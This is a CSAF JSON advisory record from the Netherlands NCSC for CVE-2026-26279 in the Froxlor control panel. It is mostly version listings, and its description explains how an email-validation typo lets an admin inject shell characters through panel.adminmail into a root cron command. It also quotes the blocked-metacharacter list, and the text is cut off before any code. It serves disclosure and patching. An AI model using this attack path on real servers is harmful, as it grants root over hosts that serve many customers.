{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-26279", "tracking": { "current_release_date": "2026-03-20T09:44:16.224573Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-26279", "initial_release_date": "2026-03-03T12:11:51.303957Z", "revision_history": [ { "date": "2026-03-03T12:11:51.303957Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Products created (1).| References created (3)." }, { "date": "2026-03-03T12:11:53.275826Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-03-03T19:09:03.052095Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)." }, { "date": "2026-03-03T19:09:04.733410Z", "number": "4", "summary": "NCSC Score updated." }, { "date": "2026-03-03T23:24:54.992215Z", "number": "5", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)." }, { "date": "2026-03-03T23:25:05.092172Z", "number": "6", "summary": "NCSC Score updated." }, { "date": "2026-03-03T23:38:52.219885Z", "number": "7", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (3).| CWES updated (1)." }, { "date": "2026-03-03T23:38:58.979212Z", "number": "8", "summary": "NCSC Score updated." }, { "date": "2026-03-04T02:39:42.777085Z", "number": "9", "summary": "References created (2)." }, { "date": "2026-03-04T15:18:52.679286Z", "number": "10", "summary": "Source created.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-04T15:19:02.023201Z", "number": "11", "summary": "NCSC Score updated." }, { "date": "2026-03-04T16:38:48.349024Z", "number": "12", "summary": "Unknown change." }, { "date": "2026-03-04T18:30:42.192959Z", "number": "13", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (105).| Product Identifiers created (105).| Products created (1).| References created (4).| CWES updated (1)." }, { "date": "2026-03-05T21:26:38.990736Z", "number": "14", "summary": "Products connected (1).| Product Identifiers created (1).| Exploits created (1)." }, { "date": "2026-03-05T21:26:45.540353Z", "number": "15", "summary": "NCSC Score updated." }, { "date": "2026-03-06T14:56:21.122396Z", "number": "16", "summary": "EPSS updated." }, { "date": "2026-03-06T14:56:25.893700Z", "number": "17", "summary": "NCSC Score updated." }, { "date": "2026-03-09T14:32:30.669981Z", "number": "18", "summary": "EPSS updated." }, { "date": "2026-03-09T14:32:37.324699Z", "number": "19", "summary": "NCSC Score updated." }, { "date": "2026-03-20T09:44:12.530406Z", "number": "20", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-20T09:44:15.351031Z", "number": "21", "summary": "NCSC Score updated." } ], "status": "interim", "version": "21" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/0.10.0", "product": { "name": "vers:unknown/0.10.0", "product_id": "CSAFPID-533796", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@0.10.0" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.0-rc1", "product": { "name": "vers:unknown/0.10.0-rc1", "product_id": "CSAFPID-3452625", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@0.10.0-rc1" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.0-rc2", "product": { "name": "vers:unknown/0.10.0-rc2", "product_id": "CSAFPID-3452626", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@0.10.0-rc2" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.1", "product": { "name": "vers:unknown/0.10.1", "product_id": "CSAFPID-533797", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@0.10.1" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.10", "product": { "name": "vers:unknown/0.10.10", "product_id": "CSAFPID-533786", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@0.10.10" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.11", "product": { "name": "vers:unknown/0.10.11", "product_id": "CSAFPID-533794", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@0.10.11" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.12", "product": { "name": "vers:unknown/0.10.12", "product_id": "CSAFPID-533789", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@0.10.12" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.13", "product": { "name": "vers:unknown/0.10.13", "product_id": "CSAFPID-533787", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@0.10.13" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.14", "product": { "name": "vers:unknown/0.10.14", "product_id": "CSAFPID-533801", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@0.10.14" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.15", "product": { "name": "vers:unknown/0.10.15", "product_id": "CSAFPID-533800", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@0.10.15" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.16", "product": { "name": "vers:unknown/0.10.16", "product_id": "CSAFPID-584149", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@0.10.16" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.17", "product": { "name": "vers:unknown/0.10.17", "product_id": "CSAFPID-586043", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@0.10.17" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.18", "product": { "name": "vers:unknown/0.10.18", "product_id": "CSAFPID-586041", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@0.10.18" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.19", "product": { "name": "vers:unknown/0.10.19", "product_id": "CSAFPID-586039", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@0.10.19" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.2", "product": { "name": "vers:unknown/0.10.2", "product_id": "CSAFPID-533785", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@0.10.2" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.20", "product": { "name": "vers:unknown/0.10.20", "product_id": "CSAFPID-586038", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@0.10.20" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.21", "product": { "name": "vers:unknown/0.10.21", "product_id": "CSAFPID-586040", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@0.10.21" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.22", "product": { "name": "vers:unknown/0.10.22", "product_id": "CSAFPID-586042", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@0.10.22" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.23", "product": { "name": "vers:unknown/0.10.23", "product_id": "CSAFPID-810715", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@0.10.23" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.23.1", "product": { "name": "vers:unknown/0.10.23.1", "product_id": "CSAFPID-810709", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@0.10.23.1" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.24", "product": { "name": "vers:unknown/0.10.24", "product_id": "CSAFPID-810704", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@0.10.24" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.25", "product": { "name": "vers:unknown/0.10.25", "product_id": "CSAFPID-810719", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@0.10.25" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.26", "product": { "name": "vers:unknown/0.10.26", "product_id": "CSAFPID-810711", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@0.10.26" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.27", "product": { "name": "vers:unknown/0.10.27", "product_id": "CSAFPID-810712", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@0.10.27" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.28", "product": { "name": "vers:unknown/0.10.28", "product_id": "CSAFPID-810714", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@0.10.28" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.29", "product": { "name": "vers:unknown/0.10.29", "product_id": "CSAFPID-810705", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@0.10.29" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.29.1", "product": { "name": "vers:unknown/0.10.29.1", "product_id": "CSAFPID-810707", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@0.10.29.1" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.3", "product": { "name": "vers:unknown/0.10.3", "product_id": "CSAFPID-533791", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@0.10.3" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.30", "product": { "name": "vers:unknown/0.10.30", "product_id": "CSAFPID-810717", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@0.10.30" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.31", "product": { "name": "vers:unknown/0.10.31", "product_id": "CSAFPID-810708", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@0.10.31" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.32", "product": { "name": "vers:unknown/0.10.32", "product_id": "CSAFPID-810716", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@0.10.32" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.33", "product": { "name": "vers:unknown/0.10.33", "product_id": "CSAFPID-810713", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@0.10.33" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.34", "product": { "name": "vers:unknown/0.10.34", "product_id": "CSAFPID-810710", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@0.10.34" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.34.1", "product": { "name": "vers:unknown/0.10.34.1", "product_id": "CSAFPID-810720", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@0.10.34.1" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.35", "product": { "name": "vers:unknown/0.10.35", "product_id": "CSAFPID-810718", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@0.10.35" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.35.1", "product": { "name": "vers:unknown/0.10.35.1", "product_id": "CSAFPID-810706", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@0.10.35.1" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.36", "product": { "name": "vers:unknown/0.10.36", "product_id": "CSAFPID-810703", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@0.10.36" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.37", "product": { "name": "vers:unknown/0.10.37", "product_id": "CSAFPID-810721", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@0.10.37" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.38", "product": { "name": "vers:unknown/0.10.38", "product_id": "CSAFPID-835395", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@0.10.38" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.38.1", "product": { "name": "vers:unknown/0.10.38.1", "product_id": "CSAFPID-835393", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@0.10.38.1" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.38.2", "product": { "name": "vers:unknown/0.10.38.2", "product_id": "CSAFPID-835394", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@0.10.38.2" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.38.3", "product": { "name": "vers:unknown/0.10.38.3", "product_id": "CSAFPID-835396", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@0.10.38.3" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.4", "product": { "name": "vers:unknown/0.10.4", "product_id": "CSAFPID-533790", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@0.10.4" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.5", "product": { "name": "vers:unknown/0.10.5", "product_id": "CSAFPID-533788", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@0.10.5" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.6", "product": { "name": "vers:unknown/0.10.6", "product_id": "CSAFPID-533795", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@0.10.6" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.7", "product": { "name": "vers:unknown/0.10.7", "product_id": "CSAFPID-533784", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@0.10.7" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.8", "product": { "name": "vers:unknown/0.10.8", "product_id": "CSAFPID-533792", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@0.10.8" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.9", "product": { "name": "vers:unknown/0.10.9", "product_id": "CSAFPID-533799", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@0.10.9" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0.0", "product": { "name": "vers:unknown/2.0.0", "product_id": "CSAFPID-876020", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.0.0" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0.1", "product": { "name": "vers:unknown/2.0.1", "product_id": "CSAFPID-876015", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.0.1" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0.10", "product": { "name": "vers:unknown/2.0.10", "product_id": "CSAFPID-879533", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.0.10" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0.11", "product": { "name": "vers:unknown/2.0.11", "product_id": "CSAFPID-882822", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.0.11" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0.12", "product": { "name": "vers:unknown/2.0.12", "product_id": "CSAFPID-882823", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.0.12" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0.13", "product": { "name": "vers:unknown/2.0.13", "product_id": "CSAFPID-897815", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.0.13" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0.14", "product": { "name": "vers:unknown/2.0.14", "product_id": "CSAFPID-945280", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.0.14" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0.15", "product": { "name": "vers:unknown/2.0.15", "product_id": "CSAFPID-945281", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.0.15" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0.16", "product": { "name": "vers:unknown/2.0.16", "product_id": "CSAFPID-945282", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.0.16" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0.17", "product": { "name": "vers:unknown/2.0.17", "product_id": "CSAFPID-945283", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.0.17" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0.18", "product": { "name": "vers:unknown/2.0.18", "product_id": "CSAFPID-945284", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.0.18" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0.19", "product": { "name": "vers:unknown/2.0.19", "product_id": "CSAFPID-945285", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.0.19" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0.2", "product": { "name": "vers:unknown/2.0.2", "product_id": "CSAFPID-876013", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.0.2" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0.20", "product": { "name": "vers:unknown/2.0.20", "product_id": "CSAFPID-945396", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.0.20" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0.21", "product": { "name": "vers:unknown/2.0.21", "product_id": "CSAFPID-945397", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.0.21" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0.22", "product": { "name": "vers:unknown/2.0.22", "product_id": "CSAFPID-3765852", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.0.22" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0.23", "product": { "name": "vers:unknown/2.0.23", "product_id": "CSAFPID-3765853", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.0.23" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0.24", "product": { "name": "vers:unknown/2.0.24", "product_id": "CSAFPID-3765854", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.0.24" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0.3", "product": { "name": "vers:unknown/2.0.3", "product_id": "CSAFPID-876017", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.0.3" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0.4", "product": { "name": "vers:unknown/2.0.4", "product_id": "CSAFPID-876018", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.0.4" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0.5", "product": { "name": "vers:unknown/2.0.5", "product_id": "CSAFPID-876019", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.0.5" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0.6", "product": { "name": "vers:unknown/2.0.6", "product_id": "CSAFPID-876016", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.0.6" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0.7", "product": { "name": "vers:unknown/2.0.7", "product_id": "CSAFPID-876014", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.0.7" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0.8", "product": { "name": "vers:unknown/2.0.8", "product_id": "CSAFPID-877915", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.0.8" } } }, { "category": "product_version_range", "name": "vers:unknown/2.0.9", "product": { "name": "vers:unknown/2.0.9", "product_id": "CSAFPID-877916", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.0.9" } } }, { "category": "product_version_range", "name": "vers:unknown/2.1.0", "product": { "name": "vers:unknown/2.1.0", "product_id": "CSAFPID-1015399", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.1.0" } } }, { "category": "product_version_range", "name": "vers:unknown/2.1.0-beta1", "product": { "name": "vers:unknown/2.1.0-beta1", "product_id": "CSAFPID-3765855", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.1.0-beta1" } } }, { "category": "product_version_range", "name": "vers:unknown/2.1.0-beta2", "product": { "name": "vers:unknown/2.1.0-beta2", "product_id": "CSAFPID-3765856", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.1.0-beta2" } } }, { "category": "product_version_range", "name": "vers:unknown/2.1.0-rc1", "product": { "name": "vers:unknown/2.1.0-rc1", "product_id": "CSAFPID-3765857", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.1.0-rc1" } } }, { "category": "product_version_range", "name": "vers:unknown/2.1.0-rc2", "product": { "name": "vers:unknown/2.1.0-rc2", "product_id": "CSAFPID-3765858", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.1.0-rc2" } } }, { "category": "product_version_range", "name": "vers:unknown/2.1.0-rc3", "product": { "name": "vers:unknown/2.1.0-rc3", "product_id": "CSAFPID-3765859", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.1.0-rc3" } } }, { "category": "product_version_range", "name": "vers:unknown/2.1.1", "product": { "name": "vers:unknown/2.1.1", "product_id": "CSAFPID-1015398", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.1.1" } } }, { "category": "product_version_range", "name": "vers:unknown/2.1.2", "product": { "name": "vers:unknown/2.1.2", "product_id": "CSAFPID-1095067", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.1.2" } } }, { "category": "product_version_range", "name": "vers:unknown/2.1.3", "product": { "name": "vers:unknown/2.1.3", "product_id": "CSAFPID-1095068", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.1.3" } } }, { "category": "product_version_range", "name": "vers:unknown/2.1.4", "product": { "name": "vers:unknown/2.1.4", "product_id": "CSAFPID-1095069", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.1.4" } } }, { "category": "product_version_range", "name": "vers:unknown/2.1.5", "product": { "name": "vers:unknown/2.1.5", "product_id": "CSAFPID-1095070", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.1.5" } } }, { "category": "product_version_range", "name": "vers:unknown/2.1.6", "product": { "name": "vers:unknown/2.1.6", "product_id": "CSAFPID-1095071", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.1.6" } } }, { "category": "product_version_range", "name": "vers:unknown/2.1.7", "product": { "name": "vers:unknown/2.1.7", "product_id": "CSAFPID-1095072", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.1.7" } } }, { "category": "product_version_range", "name": "vers:unknown/2.1.8", "product": { "name": "vers:unknown/2.1.8", "product_id": "CSAFPID-1095073", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.1.8" } } }, { "category": "product_version_range", "name": "vers:unknown/2.1.9", "product": { "name": "vers:unknown/2.1.9", "product_id": "CSAFPID-4979442", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.1.9" } } }, { "category": "product_version_range", "name": "vers:unknown/2.2.0", "product": { "name": "vers:unknown/2.2.0", "product_id": "CSAFPID-2486098", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.2.0" } } }, { "category": "product_version_range", "name": "vers:unknown/2.2.0-rc1", "product": { "name": "vers:unknown/2.2.0-rc1", "product_id": "CSAFPID-3765860", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.2.0-rc1" } } }, { "category": "product_version_range", "name": "vers:unknown/2.2.0-rc2", "product": { "name": "vers:unknown/2.2.0-rc2", "product_id": "CSAFPID-4979443", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.2.0-rc2" } } }, { "category": "product_version_range", "name": "vers:unknown/2.2.0-rc3", "product": { "name": "vers:unknown/2.2.0-rc3", "product_id": "CSAFPID-4979444", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.2.0-rc3" } } }, { "category": "product_version_range", "name": "vers:unknown/2.2.1", "product": { "name": "vers:unknown/2.2.1", "product_id": "CSAFPID-2486099", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.2.1" } } }, { "category": "product_version_range", "name": "vers:unknown/2.2.2", "product": { "name": "vers:unknown/2.2.2", "product_id": "CSAFPID-2486100", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.2.2" } } }, { "category": "product_version_range", "name": "vers:unknown/2.2.3", "product": { "name": "vers:unknown/2.2.3", "product_id": "CSAFPID-2486101", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.2.3" } } }, { "category": "product_version_range", "name": "vers:unknown/2.2.4", "product": { "name": "vers:unknown/2.2.4", "product_id": "CSAFPID-2486102", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.2.4" } } }, { "category": "product_version_range", "name": "vers:unknown/2.2.5", "product": { "name": "vers:unknown/2.2.5", "product_id": "CSAFPID-2486103", "product_identification_helper": { "cpe": "cpe:2.3:a:froxlor:froxlor:2.2.5:*:*:*:*:*:*:*", "purl": "pkg:composer/froxlor/froxlor@2.2.5" } } }, { "category": "product_version_range", "name": "vers:unknown/2.2.6", "product": { "name": "vers:unknown/2.2.6", "product_id": "CSAFPID-5574732", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.2.6" } } }, { "category": "product_version_range", "name": "vers:unknown/2.2.7", "product": { "name": "vers:unknown/2.2.7", "product_id": "CSAFPID-5574733", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.2.7" } } }, { "category": "product_version_range", "name": "vers:unknown/2.2.8", "product": { "name": "vers:unknown/2.2.8", "product_id": "CSAFPID-5574734", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.2.8" } } }, { "category": "product_version_range", "name": "vers:unknown/2.3.0", "product": { "name": "vers:unknown/2.3.0", "product_id": "CSAFPID-5574735", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.3.0" } } }, { "category": "product_version_range", "name": "vers:unknown/2.3.0-rc1", "product": { "name": "vers:unknown/2.3.0-rc1", "product_id": "CSAFPID-5574736", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.3.0-rc1" } } }, { "category": "product_version_range", "name": "vers:unknown/2.3.1", "product": { "name": "vers:unknown/2.3.1", "product_id": "CSAFPID-5574737", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.3.1" } } }, { "category": "product_version_range", "name": "vers:unknown/2.3.2", "product": { "name": "vers:unknown/2.3.2", "product_id": "CSAFPID-5574738", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.3.2" } } }, { "category": "product_version_range", "name": "vers:unknown/2.3.3", "product": { "name": "vers:unknown/2.3.3", "product_id": "CSAFPID-5574739", "product_identification_helper": { "purl": "pkg:composer/froxlor/froxlor@2.3.3" } } }, { "category": "product_version_range", "name": "vers:unknown/<2.3.4", "product": { "name": "vers:unknown/<2.3.4", "product_id": "CSAFPID-5757222", "product_identification_helper": { "cpe": "cpe:2.3:a:froxlor:froxlor:*:*:*:*:*:*:*:*" } } }, { "category": "product_version_range", "name": "vers:unknown/>=0|<2.3.4", "product": { "name": "vers:unknown/>=0|<2.3.4", "product_id": "CSAFPID-5759017" } } ], "category": "product_name", "name": "Froxlor" } ], "category": "vendor", "name": "Froxlor" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<2.3.4", "product": { "name": "vers:unknown/<2.3.4", "product_id": "CSAFPID-5755795" } } ], "category": "product_name", "name": "Froxlor" } ], "category": "vendor", "name": "Open Source" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-26279", "cwe": { "id": "CWE-482", "name": "Comparing instead of Assigning" }, "notes": [ { "category": "description", "text": "## Summary\n\nA typo in Froxlor's input validation code (`==` instead of `=`) completely disables email format checking for all settings fields declared as email type. This allows an authenticated admin to store arbitrary strings — including shell metacharacters — in the `panel.adminmail` setting. This value is later concatenated into a shell command executed as **root** by a cron job, where the pipe character `|` is explicitly whitelisted. The result is **full root-level Remote Code Execution**.\n\n---\n\n## Why This Is a Security Vulnerability (Not Just \"Admin Using Admin Features\")\n\nFroxlor is a **shared hosting control panel**. In production deployments:\n\n1. **Admin panel access does not equal root access.** Hosting providers assign the Froxlor admin role to staff who manage customer accounts, domains, and services through the web UI. These operators are not given SSH access or root shell on the underlying server. The boundary between \"panel admin\" and \"OS root\" is a deliberate security design.\n\n2. **Froxlor itself enforces this boundary.** The `safe_exec()` function (FileDir.php:224-264) exists specifically to prevent shell injection — it blocks `;`, `|`, `&`, `>`, `<`, `` ` ``, `$`, `~`, `?`. The email validation function (`validateFormFieldEmail`) exists specifically to ensure email fields contain valid emails. Both mechanisms are security boundaries that this vulnerability bypasses.\n\n3. **The root cause is an unintentional code defect.** The `==` operator on a standalone line is a no-op. No developer writes `$x == 'mail';` intentionally. This is a typo that silently breaks an entire class of input validation. It is not an admin feature.\n\n4. **Comparable CVEs exist for similar hosting panel escalations:**\n - CVE-2022-44877 (CentOS Web Panel: admin→root RCE, CVSS 9.8)\n - CVE-2023-27524 (Apache Superset: admin→RCE)\n - CVE-2021-21315 (Node.js systeminformation: privileged user→RCE)\n - CVE-2024-22024 (Ivanti: authenticated→system command execution)\n\n In each case, the fact that the attacker needs authenticated access did not prevent CVE assignment. The privilege escalation from \"application admin\" to \"OS root\" is the security impact.\n\n5. **Multi-tenant impact.** A single compromised or malicious admin gains root access to a server hosting potentially hundreds of customers. All customer data, databases, emails, and SSL keys are exposed.\n\n---\n\n## Vulnerability Details\n\n### Bug 1: Input Validation Bypass (CWE-482)\n\n**File:** `lib/Froxlor/Validate/Form/Data.php`\n\n```php\n// Line 